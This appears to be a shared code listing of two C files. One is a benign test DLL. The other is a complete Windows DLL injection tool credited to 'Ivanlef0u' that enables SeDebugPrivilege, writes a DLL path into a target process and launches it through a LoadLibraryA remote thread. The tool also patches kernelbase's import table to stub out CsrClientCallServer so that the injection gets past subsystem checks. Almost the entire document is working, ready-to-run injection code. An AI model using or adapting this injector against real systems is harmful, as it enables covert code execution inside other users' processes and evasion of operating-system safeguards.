[文件] dll.c ~ 382B
01 | #include <windows.h> |
02 | |
03 | |
04 | BOOL APIENTRY DllMain( HINSTANCE hInstance, DWORD dwReason, LPVOID lpReserved) |
05 | { |
06 | CHAR Buff[256]; |
07 | |
08 | switch (dwReason) |
09 | { |
10 | case DLL_PROCESS_ATTACH: |
11 | _snprintf(Buff, sizeof (Buff)-1, "[*] DLL injected into process %u\n" , GetCurrentProcessId()); |
12 | OutputDebugString(Buff); |
13 | //__asm int 3 |
14 | break ; |
15 | |
16 | default : |
17 | break ; |
18 | } |
19 | return TRUE; |
20 | } |
[文件] injectdll7.c ~ 7KB
001 | #define WIN32_LEAN_AND_MEAN |
002 | #include <windows.h> |
003 | #include <strsafe.h> |
004 | #include <stdio.h> |
005 | #include <stdlib.h> |
006 | |
007 | #pragma comment (lib, "advapi32.lib") |
008 | |
009 | DWORD GetDebugPrivilege() |
010 | { |
011 | HANDLE hToken; |
012 | DWORD Ret=1; |
013 | TOKEN_PRIVILEGES TP; |
014 | |
015 | if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken)) |
016 | { |
017 | printf ( "[-] Error in GetDebugPrivilege OpenProcessToken: %u\n" , GetLastError()); |
018 | Ret=0; |
019 | goto bye; |
020 | } |
021 | |
022 | if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &TP.Privileges[0].Luid)) |
023 | { |
024 | printf ( "[-] Error in GetDebugPrivilege LookupPrivilegeValue: %u\n" , GetLastError()); |
025 | Ret=0; |
026 | goto bye; |
027 | |
028 | } |
029 | |
030 | TP.PrivilegeCount=1; |
031 | TP.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED; |
032 | |
033 | if (!AdjustTokenPrivileges(hToken, |
034 | FALSE, |
035 | &TP, |
036 | 0, |
037 | NULL, |
038 | NULL)) |
039 | { |
040 | printf ( "[-] Error in GetDebugPrivilege with AdjustTokenPrivileges: %u\n" , GetLastError()); |
041 | Ret=0; |
042 | goto bye; |
043 | } |
044 | |
045 | bye: |
046 | CloseHandle(hToken); |
047 | |
048 | return Ret; |
049 | } |
050 | |
051 | |
052 | /* |
053 | kernelbase.dll |
054 | 7597BD24 6A 0C PUSH 0C |
055 | 7597BD26 68 01000100 PUSH 10001 |
056 | 7597BD2B 53 PUSH EBX |
057 | 7597BD2C 8D85 F0FDFFFF LEA EAX, DWORD PTR SS:[EBP-210] |
058 | 7597BD32 50 PUSH EAX |
059 | 7597BD33 FF15 00129775 CALL NEAR DWORD PTR DS:[<&ntdll.CsrClientCallServer>] ; ntdll.CsrClientCallServer |
060 | 7597BD39 8B85 10FEFFFF MOV EAX, DWORD PTR SS:[EBP-1F0] |
061 | 7597BD3F 8985 E8FDFFFF MOV DWORD PTR SS:[EBP-218], EAX |
062 | 7597BD45 399D E8FDFFFF CMP DWORD PTR SS:[EBP-218], EBX |
063 | 7597BD4B 0F8C 13D80100 JL KERNELBA.75999564 |
064 | */ |
065 | |
066 | DWORD __stdcall MyCsrClientCallServer( PVOID Arg1, PVOID Arg2, DWORD Arg3, DWORD Arg4) |
067 | { |
068 | *(PDWORD)(( PBYTE )Arg1+0x20)=0; |
069 | return 0; |
070 | } |
071 | |
072 | |
073 | DWORD ScanIatForImportAddress( HANDLE hModule, PCHAR Import) |
074 | { |
075 | PIMAGE_DOS_HEADER DosHeader; |
076 | PIMAGE_NT_HEADERS NtHeader; |
077 | PIMAGE_IMPORT_DESCRIPTOR ImportDescriptor; |
078 | PIMAGE_THUNK_DATA OriginalThunk; |
079 | PDWORD FirstThunk; |
080 | PIMAGE_IMPORT_BY_NAME ImportByName; |
081 | PCHAR Name; |
082 | DWORD i; |
083 | |
084 | if (hModule==NULL || Import==NULL) |
085 | return 0; |
086 | |
087 | DosHeader=(PIMAGE_DOS_HEADER)hModule; |
088 | NtHeader=(PIMAGE_NT_HEADERS)(( PBYTE )hModule+DosHeader->e_lfanew); |
089 | ImportDescriptor=(PIMAGE_IMPORT_DESCRIPTOR)(( PBYTE )hModule+NtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress); |
090 | |
091 | while (*(PDWORD)ImportDescriptor!=0) |
092 | { |
093 | //printf("[*] Module : %s\n", ((PBYTE)hModule+ImportDescriptor->Name)); |
094 | OriginalThunk=(PIMAGE_THUNK_DATA)(( PBYTE )hModule+ImportDescriptor->OriginalFirstThunk); |
095 | FirstThunk=(PDWORD)(( PBYTE )hModule+ImportDescriptor->FirstThunk); |
096 | i=0; |
097 | while (*(PDWORD)OriginalThunk!=0) |
098 | { |
099 | ImportByName=(PIMAGE_IMPORT_BY_NAME)(( PBYTE )hModule+OriginalThunk->u1.AddressOfData); |
100 | Name=( PCHAR )(( PBYTE )ImportByName+ sizeof ( WORD )); |
101 | //printf("[*] ImportName(%u): %s\n", ImportByName->Hint, Name); |
102 | |
103 | if (_stricmp(Name, Import)==0) |
104 | return ( DWORD )&FirstThunk[i++]; |
105 | |
106 | OriginalThunk++; |
107 | i++; |
108 | } |
109 | ImportDescriptor++; |
110 | } |
111 | |
112 | return 0; |
113 | } |
114 | |
115 | |
116 | HANDLE WINAPI MyCreateRemoteThread( |
117 | __in HANDLE hProcess, |
118 | __in LPSECURITY_ATTRIBUTES lpThreadAttributes, |
119 | __in SIZE_T dwStackSize, |
120 | __in LPTHREAD_START_ROUTINE lpStartAddress, |
121 | __in LPVOID lpParameter, |
122 | __in DWORD dwCreationFlags, |
123 | __out LPDWORD lpThreadId |
124 | ) |
125 | { |
126 | HANDLE hThread; |
127 | DWORD ImportAddress, OriginalCsrClientCallServer, OldProtect; |
128 | |
129 | ImportAddress=ScanIatForImportAddress(GetModuleHandle( "kernelbase.dll" ), "CsrClientCallServer" ); |
130 | if (ImportAddress==0) |
131 | { |
132 | printf ( "[-] Error in MyCreateRemoteThread with ScanIatForThunk : Cannot find thunk address\n" ); |
133 | return NULL; |
134 | } |
135 | printf ( "[*] CsrClientCallServer import address at : 0x%x\n" , ImportAddress); |
136 | |
137 | VirtualProtect(( PVOID )ImportAddress, sizeof ( DWORD ), PAGE_EXECUTE_READWRITE, &OldProtect); |
138 | OriginalCsrClientCallServer=*(PDWORD)ImportAddress; |
139 | *(PDWORD)ImportAddress=( DWORD )MyCsrClientCallServer; |
140 | |
141 | hThread=CreateRemoteThread(hProcess, lpThreadAttributes, dwStackSize, lpStartAddress, lpParameter, dwCreationFlags, lpThreadId); |
142 | if (hThread==NULL) |
143 | { |
144 | printf ( "[-] Error in MyCreateRemoteThread with CreateRemoteThread : %u\n" , GetLastError()); |
145 | return NULL; |
146 | } |
147 | *(PDWORD)ImportAddress=OriginalCsrClientCallServer; |
148 | VirtualProtect(( PVOID )ImportAddress, sizeof ( DWORD ), OldProtect, &OldProtect); |
149 | |
150 | return hThread; |
151 | } |
152 | |
153 | |
154 | BOOLEAN InjectDll( DWORD Pid, LPTSTR DllName) |
155 | { |
156 | DWORD ThreadID; |
157 | HANDLE hThread; |
158 | HANDLE hProcess; |
159 | DWORD InjectSize; |
160 | LPVOID Arg; |
161 | LPTHREAD_START_ROUTINE Injector; |
162 | CHAR FullDllPath[MAX_PATH]; |
163 | |
164 | RtlZeroMemory(FullDllPath, sizeof (FullDllPath)); |
165 | GetCurrentDirectory( sizeof (FullDllPath)- sizeof ( CHAR ), FullDllPath); |
166 | StringCbCat(FullDllPath, sizeof (FullDllPath)- strlen (FullDllPath)- sizeof ( CHAR ), "\\" ); |
167 | StringCbCat(FullDllPath, sizeof (FullDllPath)- strlen (FullDllPath)- sizeof ( CHAR ), DllName); |
168 | |
169 | printf ( "[*] FullDllPath : %s\n" , FullDllPath); |
170 | |
171 | if (!GetDebugPrivilege()) |
172 | { |
173 | printf ( "[-] Error in InjectDll with GetDebugPrivilege : Cannot grant SeDebugPrivilege\n" ); |
174 | return FALSE; |
175 | } |
176 | |
177 | hProcess=OpenProcess(PROCESS_VM_OPERATION|PROCESS_VM_WRITE|PROCESS_VM_READ|PROCESS_CREATE_THREAD|PROCESS_QUERY_INFORMATION, FALSE, Pid); |
178 | if (hProcess==NULL) |
179 | { |
180 | printf ( "[-] Error in InjectDll with OpenProcess : %u\n" , GetLastError()); |
181 | return FALSE; |
182 | } |
183 | |
184 | InjectSize= strlen (FullDllPath)+1; |
185 | |
186 | Arg=VirtualAllocEx(hProcess, NULL, InjectSize, MEM_COMMIT, PAGE_READWRITE); |
187 | if (Arg==NULL) |
188 | { |
189 | printf ( "[-] Error in InjectDll with VirtualAllocEx : %u\n" , GetLastError()); |
190 | CloseHandle(hProcess); |
191 | return FALSE; |
192 | } |
193 | |
194 | if (WriteProcessMemory(hProcess, Arg, FullDllPath, InjectSize, 0)==FALSE) |
195 | { |
196 | printf ( "[-] Error in InjectDll with WriteProcessMemory : %u\n" , GetLastError()); |
197 | CloseHandle(hProcess); |
198 | return FALSE; |
199 | } |
200 | |
201 | Injector=(LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle( "kernel32.dll" ), "LoadLibraryA" ); |
202 | hThread=MyCreateRemoteThread(hProcess, NULL, 0, Injector , Arg, 0, &ThreadID); |
203 | if (hThread==NULL) |
204 | { |
205 | printf ( "[-] Error in InjectDll with MyCreateRemoteThread : %u\n" , GetLastError()); |
206 | CloseHandle(hProcess); |
207 | return FALSE; |
208 | } |
209 | |
210 | if (WaitForSingleObject(hThread, INFINITE)==WAIT_FAILED) |
211 | { |
212 | printf ( "[-] Error in InjectDll with WaitForSingleObject : %u\n" , GetLastError()); |
213 | |
214 | CloseHandle(hProcess); |
215 | CloseHandle(hThread); |
216 | return FALSE; |
217 | } |
218 | |
219 | if (VirtualFreeEx(hProcess, Arg, 0, MEM_DECOMMIT)==FALSE) |
220 | { |
221 | printf ( "[-] Error in InjectDll with VirtualFreeEx : %u\n" , GetLastError()); |
222 | |
223 | CloseHandle(hProcess); |
224 | CloseHandle(hThread); |
225 | return FALSE; |
226 | } |
227 | |
228 | CloseHandle(hProcess); |
229 | CloseHandle(hThread); |
230 | |
231 | return TRUE; |
232 | } |
233 | |
234 | |
235 | int __cdecl main( int argc, char * argv[]) |
236 | { |
237 | DWORD Pid; |
238 | |
239 | printf ( "Custom CreateRemoteThread() which bypass subsystem control\nBy Ivanlef0u\nBE M4D !\n\n" ); |
240 | |
241 | if (argc<3) |
242 | { |
243 | printf ( "Usage is : %s <pid> <dll name>\n" ); |
244 | return 0; |
245 | } |
246 | |
247 | Pid= strtoul (argv[1], NULL, 10); |
248 | if (Pid==0 || Pid==4) |
249 | return 0; |
250 | |
251 | InjectDll(Pid, argv[2]); |
252 | |
253 | printf ( "[+] Dll successfully injected !\n" ); |
254 | |
255 | return 0; |
256 | } |